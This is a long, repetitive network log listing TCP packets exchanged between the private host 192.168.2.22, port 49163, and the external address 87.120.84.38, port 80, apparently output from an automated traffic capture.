Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
